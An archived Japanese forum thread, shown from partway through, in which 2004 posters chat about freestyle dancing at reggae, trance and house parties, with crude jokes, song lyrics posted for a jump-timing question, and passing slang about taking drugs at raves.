171さんみたいにレゲエのビデオとか買って学ぼうかとおもったけど
それじゃあ人の真似しかできなくなるから自己流でいってます!!
こないだ、一緒に踊ってた男が「起っちゃった」とかいっててまぢうけた(笑)
レゲエ踊ってると起っちゃう男の人ここにいます?

174 :名無しチェケラッチョ♪:04/02/21 06:41 ID:???
全員起ちます。というか見てらんない・・・。

175 :名無しチェケラッチョ♪:04/02/21 08:09 ID:???
もしかしてキスいや見た?

176 :名無しチェケラッチョ♪:04/02/24 02:10 ID:???
見てないけどなんで?

177 :名無しチェケラッチョ♪:04/02/24 12:59 ID:???
キスイヤでレゲエのダンスにはまってる女が出てたからその影響かと思ってみたのさ

178 :名無しチェケラッチョ♪:04/02/25 03:33 ID:???
レゲエのダンスってほんとに腰降ってファックしてるとこから来てるんだよ。

って誰かが言ってた。

>>177
なーんだ。そういうことか
ところでおれは173じゃないのでもしかすると173はほんとにキスイヤ見たかもよ。

179 :173:04/02/25 16:46 ID:DG+2zUta
173だけど、キスイヤのそれはみてないなぁ〜
みたかったなぁ。。。

180 :名無しチェケラッチョ♪:04/02/25 19:13 ID:GeYCh4ur
チョト、STAYジャンプについて聞きたい事あるんですが。
他スレでスルーされたんでここに書いちゃいますよ

あれ、どの部分でしゃがんでどの部分で飛ぶんですか?
全く覚えられないです
↓に、音と歌詞書くんで誰か教えて・・・・

181 :180です:04/02/25 19:14 ID:GeYCh4ur
【音】http://www56.tok2.com/home/lucky7stars/WendyPhillips_Stay-AirscapeMix.ram

I can see the light upon your face
and then watch it disappear without a trace
And yes when your body and soul close to mine
My head starts to spin and my hands start to shake
So is this a dream, or am I never awake?

Stay, don't ever leave me lonely
And I will gladly give my life
To you, so please won't you stay?

I surrender to your warm embrace
I dream and suddenly I'm in an other place
And yes it's a miracle I'm under your spell
My heart is on fire, I have no regrets
If I never find you I'll never forget

Stay, don't ever leave me lonely
And I will gladly give my life
To you, so please won't you stay?

Stay, don't ever leave me lonely
And I will gladly give my life
To you, so please won't you stay?
Won't you stay?
Won't you stay?

182 :180です:04/02/25 19:16 ID:GeYCh4ur
↑の続きです

Stay, won't you stay?

Stay.......

My heart is on fire, I have no regrets
If I never find you I'll never forget

Stay, don't ever leave me lonely
And I will gladly give my life
To you, so please won't you stay?

Stay, don't ever leave me lonely
And I will gladly give my life
To you, so please won't you stay?
Won't you stay?
Won't you stay?

Stay, won't you stay?

Stay, don't ever leave me lonely
And I will gladly give my life
To you, so please won't you stay?
Won't you stay?
Won't you stay?

長文すまなかったッス!よろしくッス!

183 :名無しチェケラッチョ♪:04/02/28 18:55 ID:???
俺も昔気になったなーレイバーがピョンピョン跳ねるやつ。
ラビットステップっていうんだっけ?
でも奴らあれしかしないんだよね。なんかそれみてると優越感に浸ってる
キモイ連中に思えて来て、結局自己流で踊ることにしました。
おかげで
見たことないけど自分の踊りは相当キモイと思うっす。

184 :名無しチェケラッチョ♪:04/03/01 21:10 ID:RVZcz1JK
>>183
レイブはキモければキモいほど視界が楽しくなるので
君もその調子で、いやもっとキモくなれるように頑張りなさい。

185 :名無しチェケラッチョ♪:04/03/02 06:29 ID:???
おっす!キモ踊りしてるやつ見ると挙がりますよね。

186 :名無しチェケラッチョ♪:04/03/02 08:07 ID:hld/5Thg
民族舞踊、そうだなロシアのコサックダンスなんか素敵だろう

187 :名無しチェケラッチョ♪:04/03/03 02:10 ID:???
阿波踊りをやったら、きっと君はヒーロー。

間違いない。

188 :名無しチェケラッチョ♪:04/03/04 00:31 ID:???
同僚に、どんな踊りなの?と言われて軽く披露した。
阿波踊りですかと言われました。そんな俺ってヒーローでつか?

189 :名無しチェケラッチョ♪:04/03/04 05:10 ID:???
英雄と書いてヒーローです。

190 :名無しチェケラッチョ♪:04/03/09 16:21 ID:LDNiiGob
Stay は、Aサビの前じゃなかったっけ??ジャンプ。

191 :名無しチェケラッチョ♪:04/03/11 01:53 ID:???
>>161

>まぁいつも喚きながら痙攣してるけど。
想像したらキモー

192 :名無しチェケラッチョ♪:04/04/01 21:19 ID:???
笑顔で楽しそうに踊る人歓迎

193 :名無しチェケラッチョ♪:04/04/21 21:28 ID:ESnenQmS
あげ

194 :名無しチェケラッチョ♪:04/04/27 05:54 ID:LItThiOt
>Q.
かっこよく踊るにはどうしたらいいですか。
PVみたいなものは売ってないのですか?

A.
トランスには特定の踊り方は無く、音楽に合わせて自由に自分を表現することが基本で、
ブレイクの時に自然と手が挙がったり、激しくダンスしたりしているうちに、
自分の表現ができてくるのではないでしょうか?
また最近、ごく一部の人が特定の曲に“振り付け”のようなものをつけているのを見かけるのですが、
非常にカッコ悪いのでやめてもらいたいです。世界的にみても、曲に振り付けをつけるなどと言うのはどこにもないですし、
そういうダンスをトランスですること自体、恥ずかしいということに気づいて欲しいです。
みなさん、カッコ良く踊って楽しみましょう!

This is deliverance of Velfarre.
I absolutely agree.



195 :名無しチェケラッチョ♪:04/04/27 15:22 ID:???
トランスを吹っ切れて踊りたい・・・
まだはずかしい・・・

196 :名無しチェケラッチョ♪:04/04/27 17:33 ID:???
まわりがどんな踊り方してるかなんて気にする必要まったくなし。
多少ぶつかったりしても、笑顔を忘れずに!

197 :名無しチェケラッチョ♪:04/04/30 04:25 ID:???
>>194
阿波踊りとかオクラホマミキサーとか全部振り付けついてんじゃねーか、この野郎。

198 :名無しチェケラッチョ♪:04/05/02 00:05 ID:???
>>197
よく読もうよ・・

199 :名無しチェケラッチョ♪:04/05/09 20:42 ID:???
age

200 :名無しチェケラッチョ♪:04/05/09 20:43 ID:l0GPiT5Z
sageてもうたage

201 :名無しチェケラッチョ♪:04/05/09 20:59 ID:/auljAXH
漢気に溢れながらチンコをシゴく。

202 :名無しチェケラッチョ♪:04/05/09 21:46 ID:???
タマ食ってりゃ嫌でも踊りまくる

203 :名無しチェケラッチョ♪:04/05/10 18:07 ID:???
意地でも食いたくないんですが、そういう場合はどうしたらいいんですかね?

204 :名無しチェケラッチョ♪:04/05/10 19:25 ID:???
食わずに踊ればいいじゃん

205 :名無しチェケラッチョ♪:04/05/10 20:25 ID:???
そうするとなんか恥ずかしくて思いっきり踊れないんです

206 :名無しチェケラッチョ♪:04/05/10 21:41 ID:???
じゃぁ諦めろ

207 :名無しチェケラッチョ♪:04/05/10 22:46 ID:lHiYAMwm
自己流・踊りたいように踊るのが一番!逆に同じ踊り方しかできない奴らの方がどうかと思う!
私もレゲエの腰振りで毎週筋肉痛☆

208 : :04/05/10 23:38 ID:GNXOn/HS
そうだな。まずうんこ。

209 :名無しチェケラッチョ♪:04/05/10 23:45 ID:OO8J1erc
轟さんのようにギュンギュンする!

210 : :04/05/11 00:11 ID:tS0Pxjuz
そしてまんぽ。

211 :名無しチェケラッチョ♪:04/05/11 03:53 ID:PboPNbri
レゲェダンサーの腰使いもどうかと!はめたくなるわぃ。トランスでネタ食って踊るのとレゲェの踊りは、しゅしそのものがちがうってきみ

212 :名無しチェケラッチョ♪:04/05/11 06:12 ID:???
そもそもトランスはネタなんか喰わなくても陶酔状態に入れる音楽だと思うが。
好きに踊りゃいいんだよ。

まあガルガルヲのトカゲ踊りはみっともないけどな。
おつむを毒でやられてるからしかたないか。

213 :名無しチェケラッチョ♪:04/05/11 10:58 ID:Z4pQTjJu
トカゲ踊り?ってどんなの??
トランス行かないからわからないのだけど。

214 :名無しチェケラッチョ♪:04/05/11 11:09 ID:???
トカゲ踊り気になる
ゴキブリに似てるってどっかで見たけどその通りだと思ってたが
今度はトカゲ!?

215 :名無しチェケラッチョ♪:04/05/11 15:56 ID:???
エリマキトカゲが走ってるような感じだよ。

216 :名無しチェケラッチョ♪:04/05/11 16:02 ID:???
ありゃ典型的なゴア踊りだよ>>212~215


217 :名無しチェケラッチョ♪:04/05/12 01:02 ID:???
ダサそーやな

218 :名無しチェケラッチョ♪:04/05/14 22:11 ID:???
ハウスのパーティーでよくかっこよく踊ってる人いますよね?
あれは、ハウスダンスとでも言うんですか?


219 :名無しチェケラッチョ♪:04/05/15 18:19 ID:scWYH4lN
age

220 :名無しチェケラッチョ♪:04/05/15 22:55 ID:0/MNYxiR
ハウサーの踊りはレイバーよかきれい。

221 :名無しチェケラッチョ♪:04/05/16 12:19 ID:???
ストリート系ダンスのジャンルとしてハウスがあるからな

222 :名無しチェケラッチョ♪:04/05/21 04:59 ID:???
どうでもいいことだが、>>120>>121のその後が気になるぅ?♪

39 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)